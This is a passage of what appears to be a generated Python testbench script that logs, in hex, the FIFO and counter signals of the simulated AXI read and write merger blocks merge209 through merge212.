logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_acount"))
